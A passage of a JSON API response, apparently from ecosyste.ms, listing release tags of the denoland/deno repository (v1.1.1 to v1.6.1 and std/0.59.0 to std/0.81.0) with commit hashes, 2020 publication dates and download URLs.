d%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denol